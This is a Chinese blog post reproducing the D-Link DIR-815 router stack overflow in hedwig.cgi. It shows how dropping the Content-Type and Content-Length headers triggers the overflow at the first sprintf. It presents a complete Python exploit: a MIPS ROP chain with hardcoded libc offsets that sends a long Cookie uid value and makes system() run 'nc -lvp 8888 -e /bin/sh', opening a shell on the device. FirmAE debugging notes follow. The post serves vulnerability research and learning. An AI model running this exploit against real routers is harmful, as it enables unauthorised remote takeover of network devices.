DIR-815 栈溢出二三事

已于 2022-07-15 20:12:08 修改
阅读量3.7k 收藏 1
点赞数
文章标签: 安全 pwn iot
于 2022-07-15 01:21:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45209963/article/details/125794269
版权
本文详细介绍了DIR-815路由器栈溢出漏洞的复现过程,发现并纠正了现有资料中的错误。作者通过分析程序代码,揭示了如何通过构造特定HTTP请求绕过验证,直接在第一个sprintf处触发栈溢出。文章还分享了利用技巧和调试过程中遇到的问题,提供了简化后的exploit代码。同时,文章强调了在安全研究中不应过分依赖已有资料,鼓励独立思考。
摘要由CSDN通过智能技术生成

DIR-815 栈溢出二三事

参考资料

《揭秘家用路由器0day漏洞挖掘技术》第10章
winmt师傅的复现
F01TH师傅的复现

写作原因

写这篇文章的起因是我参照网上的教程与《揭秘家用路由器0day漏洞挖掘技术》一书进行DIR-815路由器栈溢出漏洞的复现。在此过程中,发现几乎所有资料都特意提到了漏洞爆发于第二个sprintf处。不过,经过逆向与调试,我发现这一说法本身存在问题(来源应该就是《0day》一书中的描述)

实际上,经我测试,通过使用不合法的http请求头,可以绕过相关的验证,直接使用第一个sprintf触发栈溢出并返回,简化了exp流程。

此外,本文还记录了使用FirmAE进行设备模拟与远程调试方面的踩坑过程,希望能对大家有所帮助。

程序分析

这里只对涉及到触发漏洞的环境变量与全局变量部分做解释。先来说一下《0day》这本书里的分析。如下图所示
在这里插入图片描述

IDA反编译结果如下(第一处sprintf):
在这里插入图片描述

第二处sprintf:
在这里插入图片描述
观察一下第一个sprintf,可以看到执行完后有v7haystack两个变量控制的跳转。
v7就是fopen的结果,真机存在该目录,所以恒真。关键在于haystack这个变量。
涉及这个变量的部分位于sub_4096AC中,而该函数的指针被传入了cgibin_parse_request这个函数中。

cgibin_parse_request函数:
在这里插入图片描述
在这里插入图片描述
正常情况下,我们的http请求中都会带有正常的content-typecontent-length字段。如果是这样的话,就会进入if(v7)中的while(1)这个循环,并在循环中返回。
顺便说一句,图中的stru_42c014为程序自定义结构体,格式为|字符串地址|字符串长度|函数地址|,结合上文,综合作用是通过检查Content-Type中的起始类型(application/audio/example)跳转到相应的处理函数。

如果我们的POST包中字段Content-Typeapplication/x-www-form-urlencoded的话,就会跳转到sub_403B10,进一步进入sub_402FFC函数。在该函数中,会进一步调用sub_402B40函数,并通过引用栈指针的方式,调用sub_4096AC函数,从而修改了heystack的值。

sub_403B10:
在这里插入图片描述

sub_402B40中最终调用sub_4096AC的部分:
在这里插入图片描述

对应的调试结果:
在这里插入图片描述
所以,在POST包中字段Content-Typeapplication/x-www-form-urlencoded的话,就会对heystack进行赋值,从而导致程序一直执行到第二个sprintf处并触发栈溢出。

那么,如果我们改造或完全删除Content-TypeContent-Length两个字段,避免这一系列的函数调用,那不就可以在第一个sprintf后直接返回造成栈溢出了么?(haystack保持为0后,可以直接goto LABEL_34,再goto LABEL_25,直接正常返回)
在这里插入图片描述

利用手法

看看cgibin_parse_request函数的开头:
![在这里插入图片描述](https://img-blog.csdnimg.cn/752822d0f976447a8a2bec724b739ce9.png
)
只需要我们让Content-TypeContent-Length中任何一个字段不存在或令Content-Length字段的值为0,就可以让v7=0。而这么做的后果就是——if(v7)这个分支被完全跳过,函数直接从return v9正常返回。
然后就可以一路执行到if(!haystack)处,直接多跳返回。这样就完成了利用第一个sprintf进行栈溢出攻击。

最终exp如下,这里采用的是正连shell的方式:

from pwn import*
import urllib3
from http.client import HTTPConnection
HTTPConnection.debuglevel=1

http = urllib3.PoolManager()

url = "http://192.168.0.1:80/hedwig.cgi"

cmd = b'nc  -lvp 8888 -e /bin/sh &&'
#cmd = b'ln -s /bin/busybox /bin'
libc_base = 0x77f34000
 
payload = b'a'*1007 #溢出长度稍有不同
payload += p32(libc_base + 0x53200 - 1) # s0  system_addr - 1
payload += p32(libc_base + 0x169C4) # s1  addiu $s2, $sp, 0x18 (=> jalr $s0)
payload += p32(0x7fff67e0+24)*7 #system参数地址,直接使用栈地址
payload += p32(libc_base + 0x32A98) # ra  addiu $s0, 1 (=> jalr $s1)
payload += b'a'*24
payload += cmd


headers = {
    "Cookie"        : b"uid=" + payload,
#    "Content-Type"  : b"abcd",
#    "Content-length": b"0",
}


r = http.request('POST', url , headers=headers)
print(r.headers)

打完exp后本地nc远程的8888端口即可。

第一个sprintf在溢出数据结尾有/postxml(sprintf格式化的结果),由于我们使用的system参数正是结尾的这一部分栈字符串,需要在payload中加入&&||进行bypass。此外,由于返回流程不完全相同,system参数变为s3,故在溢出过程中将含s3的一连串寄存器均置为相应的栈地址(p32(0x7fff67e0+24)*7)。

踩坑相关

  • FirmAE本身很好用,但默认busybox很烂(没有nc),在shell连接后的/firmadyne目录下有需要用到的所有工具(包括一个新版的busyboxgdbserver),替换掉原有busybox并建立nc的软链接,这样才能使用nc命令并反弹shell。

  • 直接使用FirmAE脚本提供的gdbserver可能看不到httpd进程。调试时先ps找一下httpdpid,再用gdbserver attach上去即可。

  • gdbserver在开了ASLR的情况下无法跟进子进程,设置了set follow-fork-mode child也不行,暂且不清楚原因

  • 一开始使用了requests库编写exp,后来发现requests会自动纠正不正常的数据包header,故改用urllib3完成。

  • 在脚本中添加from http.client import HTTPConnection HTTPConnection.debuglevel=1两句,打开调试模式,可以看见发送的完整数据包,便于观察与调整exp。

总结

  • 尽信书则不如无书,安全需要的正是旁逸斜出的思维。

在这里插入图片描述

  • requests库本身是专用于爬虫领域的,它可能对于爬虫工程师来说很友好,但如果进行安全方面的研究,建议使用原始的urllib、urllib2、urllib3库来构造定制化程度更高的payload。
  • 直接绕过不用分析代码好爽啊
xyzmpv
关注
物联网漏洞挖掘入门--DLINK-DIR-645路由器栈溢出漏洞分析复现
墨痕诉清风的博客
09-11 3801
https://www.rapid7.de/db/modules/exploit/linux/http/dlink_hedwig_cgi_bof 这个栈溢出的原因是由于cookie的值过长导致的栈溢出。服务端取得客户端请求的HTTP头中Cookie字段中uid的值,格式化到栈上导致溢出。通过对漏洞点进行分析,搭建模拟环境并完成整个漏洞利用过程。 (文章中有不足之处,还请各位......
Linux内核--内存管理(六)用户栈与内核栈及内核地址空间分布
文艺小少年的博客
11-16 330
本篇文章主要来分析以下用户栈、内核栈以及内核空间中的空间布局、地址布局(内核代码存放位置等)
D-Link DIR-815 B1版 快速安装手册(繁体中文)
06-14
适用于DIR-815硬件版本B1 D-Link DIR-815 中文快速安装手册
路由器漏洞挖掘之 DIR-815 栈溢出漏洞分析
abc380620175的博客
06-10 816
这次笔者来复现一个比较经典的栈溢出漏洞:D-link dir-815 栈溢出。其实这个路由器的栈溢出漏洞的利用方式和之前 DVRF 靶机平台的栈溢出例子大同小异,只是需要注意下一些小的地方。 前言 这个栈溢出的原因是由于 cookie 的值过长导致的栈溢出。服务端取得客户端请求的 HTTP 头中 Cookie 字段中 uid 的值,格式化到栈上导致溢出。 漏洞分析 大体流程 首先还是先将...
从零到一:复现 DIR-815 栈溢出漏洞
Coder的博客
01-24 2808
从零到一:复现 DIR-815 栈溢出漏洞
DIR-815 路由器多次溢出漏洞分析
tigerOrtiger的博客
06-01 1681
漏洞信息 固件下载地址 ftp://ftp2.dlink.com/PRODUCTS/DIR-815/REVA/DIR-815_FIRMWARE_1.01.ZIP 漏洞成因分析 【漏洞信息】 根据漏洞信息,可以知道漏洞存在于漏洞组件hedwig.cgi 中。而hedwig.cgi 在cgibin 中。 而漏洞产生的原因是Cookie的值超长早场缓冲区溢出。 这里使用IDA 打开 cgibin 。 查找HTTP_COOKIE 。直接查找字符串,查看交叉引用。定位到sess_get_uid 函数。 在ses
踏入IOT安全世界:DIR-815路由器多次溢出漏洞分析复现
最新发布
蚁景网安学院
03-26 952
在进行IOT安全领域的学习和实践中,经典漏洞的复现是必不可少的一环。本文将介绍一个经典漏洞,涉及到Binwalk、firmware-mod-kit、FirmAE等工具的使用,以及对DIR-815路由器中多次溢出漏洞的复现过程。
递归算法的陷阱与技巧:栈溢出的避免术
[递归算法的陷阱与技巧:栈溢出的避免术](https://img-blog.csdnimg.cn/3aabd38726f949c8a0c6aaf0899f02e0.png) # 1. 递归算法概述 递归算法是计算机科学中一种基础且强大的问题解决工具,它允许一个函数直接或间接...
递归遍历指定目录所有的文件优化版本(不会栈溢出
08-01
这个主题涉及的中心知识点是“递归遍历”和“栈溢出”优化,我们将详细探讨这两个概念以及如何在C++中实现优化的文件遍历。 **1. 递归遍历目录** 递归遍历是一种自上而下、逐级深入遍历目录树的方法。它通过调用...
基于栈溢出的EXPLOIT编写
01-10 2832
声明:以下涉及的内容只作为学习的目的,任何因为滥用本篇内容而导致对个人或者企业组织造成危害,作者并不承担任何责任。 ◆ 目标软件 Easy RM to MP3 Converter(版本2.7.3.700) ◆ 辅助工具 WinDbg6.12、Metasploit3.4.1、ActivePerl5.12 ◆ 漏洞描述 通过创建一个恶意的.m3u文件将触发Easy RM to MP3 Converter (version 2.7.3.700)缓冲区溢出利用。 ◆ 测试平台 Windows
D-Link DIR-815 A1版 更新固件 1.04b03
06-14
适用于DIR-815 硬件版本A1 固件日期:2013年07月31日 更新项目:增加安全
栈及栈溢出
风雨无阻
07-05 1554
1、内存空间分布 常规的内存布局,在UNIX环境高级编程中: 代码段: (code segment/text segment)通常是指用来存放程序执行代码的一块内存区域。这部分区域的代码属于只读。在代码段中,字符串常量也属于这部分。整个程序的代码,以及所有的常量。这部分内存是是固定大小的,只读的。 数据段:数据段(data segment)通常是指用来存放程序中已初始化的全局变量的一块内存区域。数据段属于静态内存分配。初始化为非零值的全局变量。 BSS段:(bss segment)通常是指用来存
sprintf溢出的bug
weixin_30449453的博客
02-16 373
  向printf、sprintf这种函数在编译时很难检查错误,所以程序员必须小心。比如我就遇到了这样的bug: 1 void test() 2 { 3 char t[3]; 4 sprintf(t,"123"); 5 } 6 //执行sprintf时没有报错,但是退出test时出错   这是因为缓冲区溢出必然会覆盖调用函数的堆栈,导致函数退出时无法正确恢...
XCTF 进阶 RE catch-me
A_dmin的博客
10-09 510
XCTF 进阶 RE catch-me 下载文件,用ida打开提示是一个二进制文件,,,,
dir815 CNVD-2013-11625漏洞复现(未完成
m0_50526323的博客
05-20 197
目标架构mipsel32,小端 bin文件以及qemu虚拟机如下 链接:https://pan.baidu.com/s/1u2z1gZSYsyTQ-IgR9L-mfQ 提取码:dir8 老三样 binwalk解压 运气比较好,没啥花活 添加tap0 使用祖传脚本 账号密码双root 配置虚拟机网络连接 计划通 上传文件 看来第一次忘给权限了 chmod 777 -R ./squashfs-root sudo ssh-keygen -R 192.168.0.1 scp -r ./squ
esp8266 sprintf函数使用溢出问题
qq_27568125的博客
02-07 2677
在使用ESP8266 跑freertos操作系统时,如果使用sprintf函数进行将其他数据转换成字符串格式时,如果将存储字符串的数组定义成局部数组会出现程序跑死然后重启的问题。为了避免程序跑死问题,需要将存储字符串数组定义成全局数组或者局部数组用static关键字声明。出现这种问题的原因是在线程切换时数组的地址偏移出现了问题,来回切换地址出现了问题。一般情况下我们定义成全局变量就不会出现这种问题
揭秘家用路由器0day漏洞挖掘技术读书笔记 D-Link DIR-815 hedwig.cgi溢出漏洞分析
houjingyi的博客
10-03 6708
准备工作环境搭建 问题1: 用32位的系统,原因之后会详细说。 问题2: 如果用wine+IDA6.8的话由于后续会使用到IDAPython插件,故还需要下载https://www.dllme.com/dll/download/14091/python27.dll并放置到ida根目录下。同时以如下方式启动idaq.exe:export PYTHONPATH=/usr/lib/python2.
pwn 格式化字符串漏洞及例题
limenzzz的博客
10-21 1976
一些输出函数例如printf,sprintf都接受参数输入,例如printf("%d",s)。但如果在编写函数时为方便写为printf(s),则可通过对s输入的构造来执行一些操作。 在其中常见的有通过-%p %08x等参数来查看偏移值,简单来说,就是输入的值存在于栈的哪个地方。
sprintf函数可能会造成由buf指向的缓冲区的溢出
xuefa的博客
10-20 1119
曾经在一个项目中遇到这样的执行出错:“stack over flow”,经查与sprintf有关。 int sprintf(char *restrict buf, const char *restrict format, ...) 调用者在使用sprintf函数有责任确保该缓冲区足够大。snprintf函数可以解决这种缓冲区溢出问题。 int snprintf(char *restrict
请举出java中使用递归的三个例子
09-06
### 回答1: 当然,我很乐意回答你的问题! 在Java中,可以使用递归实现很多算法和数据结构。以下是三个使用递归的例子: 1. 阶乘函数:计算一个正整数的阶乘。可以使用递归来实现。例如,5的阶乘为5x4x3x2x1=120。 ```java public static int factorial(int n) { if (n == 0 || n == 1) { return 1; } else { return n * factorial(n - 1); } } ``` 2. 斐波那契数列:一个数列,第一个和第二个数都为1,接下来的每个数都是前面两个数之和。可以使用递归来实现。 ```java public static int fibonacci(int n) { if (n == 1 || n == 2) { return 1; } else { return fibonacci(n - 1) + fibonacci(n - 2); } } ``` 3. 文件搜索:可以使用递归搜索一个目录中的所有文件。如果当前路径是目录,则递归调用该方法;如果是文件,则输出文件名。 ```java public static void searchFiles(File dir) { if (dir.isDirectory()) { File[] files = dir.listFiles(); if (files != null) { for (File file : files) { searchFiles(file); } } } else { System.out.println(dir.getName()); } } ``` ### 回答2: 在Java中,递归是一种函数自己调用自己的技术。以下是三个使用递归的Java示例: 1. 阶乘函数: 阶乘是一个经典的递归问题。可以使用递归来计算给定数字的阶乘。例如,可以使用以下方法计算5的阶乘: ```java public static int factorial(int n) { if (n == 0) { return 1; } else { return n * factorial(n-1); } } ``` 在这个例子中,如果输入的参数n为0,则返回1,否则,将n乘以递归调用factorial方法,并将n减1。 2. 斐波那契数列: 斐波那契数列是一个经典的递归问题。可以使用递归来计算斐波那契数列的第n个数字。例如,可以使用以下方法计算第n个斐波那契数: ```java public static int fibonacci(int n) { if (n <= 1) { return n; } else { return fibonacci(n-1) + fibonacci(n-2); } } ``` 在这个例子中,如果输入的参数n小于或等于1,则返回n,否则,将递归调用fibonacci方法来计算n-1和n-2的斐波那契数,并将它们相加。 3. 文件路径遍历: 在Java中,可以使用递归遍历文件夹中的所有文件和子文件夹。例如,可以使用以下方法来遍历文件夹中的所有文件: ```java public static void listFiles(File dir) { File[] files = dir.listFiles(); if (files != null) { for (File file : files) { if (file.isDirectory()) { listFiles(file); // 递归调用自身来处理子文件夹 } else { System.out.println(file.getAbsolutePath()); } } } } ``` 在这个例子中,首先获取文件夹中的所有文件和子文件夹。然后,遍历所有文件和文件夹,如果是文件夹,则递归调用自身来处理子文件夹,如果是文件,则打印文件的绝对路径。 ### 回答3: 在Java中,递归是一种方法或函数调用自身的技术。下面是三个在Java中使用递归的例子: 1. 阶乘计算:阶乘是将一个正整数n与小于等于n的所有正整数相乘的结果。使用递归来计算阶乘是一种常见的做法。例如,计算5的阶乘可以使用以下递归函数: ```java public static int factorial(int n) { if (n == 0) { return 1; } else { return n * factorial(n - 1); } } ``` 2. 斐波那契数列:斐波那契数列是一个数列,前两个数字是0和1,之后的每一个数字都是前两个数字之和。使用递归来生成斐波那契数列是一种常见的方法。例如,生成前10个斐波那契数列可以使用以下递归函数: ```java public static int fibonacci(int n) { if (n <= 1) { return n; } else { return fibonacci(n - 1) + fibonacci(n - 2); } } ``` 3. 文件目录遍历:在Java中,可以使用递归来遍历文件目录。例如,想要遍历一个文件夹及其子文件夹中的所有文件,可以使用以下递归函数: ```java public static void listFiles(File directory) { if (directory.isDirectory()) { File[] files = directory.listFiles(); if (files != null) { for (File file : files) { listFiles(file); } } } else { System.out.println(directory.getPath()); } } ``` 以上是三个在Java中使用递归的例子。递归在某些情况下可以简化代码,但需要注意递归深度过深可能导致栈溢出
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值